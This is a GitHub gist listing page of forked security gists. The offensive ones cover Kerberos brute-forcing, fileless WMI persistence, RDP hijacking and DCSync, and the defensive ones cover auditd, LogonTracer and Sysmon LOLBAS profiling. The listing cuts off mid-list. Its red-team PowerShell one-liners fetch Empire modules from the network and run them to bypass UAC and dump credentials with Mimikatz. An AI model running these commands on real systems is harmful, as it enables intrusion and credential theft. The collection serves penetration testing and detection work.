
Jesse Moore jessefmoore

@jessefmoore
jessefmoore / pwn-o-magic.md
Created September 2, 2019 16:09 — forked from jivoi/pwn-o-magic.md
Pwning internal networks automagically

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
@jessefmoore
jessefmoore / kerberos_attacks_cheatsheet.md
Created August 29, 2019 02:03 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@jessefmoore
jessefmoore / WMI-Persistence.ps1
Created August 15, 2019 16:57 — forked from infosecn1nja/WMI-Persistence.ps1
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html
<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
#>
$EventFilterName = "Fileless WMI Persistence SystemUptime"
@jessefmoore
jessefmoore / LogonTracer-Zero-to-Graph.md
Created July 28, 2019 14:53 — forked from nepobef/LogonTracer-Zero-to-Graph.md
How to go from (almost) zero to viewing graphs with LogonTracer

How to go from (almost) zero to viewing a graph of events with LogonTracer

The Readme for the LogonTracer project is missing a couple of steps, so I'm jotting down all the kinks. I'm glossing over installing Debian into a VM.

There is little thought for security in this setup; all actions are taken as the root user. If using this in production, you'll probably need to 'sudo' in a few places.

My Setup

I set this up in about 30 minutes using a VM in VMware workstation. I was able to connect to the Logontracer webpage from my host OS.

RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop on and hijack RDP sessions. Here is a gist of (semi) interesting findings
that are not very new...
===========
Inspiration
===========
As you may already know...
@jessefmoore
jessefmoore / audit.rules
Created May 29, 2019 19:48 — forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
@jessefmoore
jessefmoore / AtomicTestsCommandLines.txt
Created May 29, 2019 19:47
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@jessefmoore
jessefmoore / Invoke-DCSync.ps1
Created March 10, 2019 22:35 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
@jessefmoore
jessefmoore / sysmon_lolbas_profiler.ps1
Created February 26, 2019 02:34 — forked from leoloobeek/sysmon_lolbas_profiler.ps1
Profile Sysmon logs to discover which LOLBAS binaries have run and what their command line arguments were
#https://github.com/LOLBAS-Project/LOLBAS
$lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdep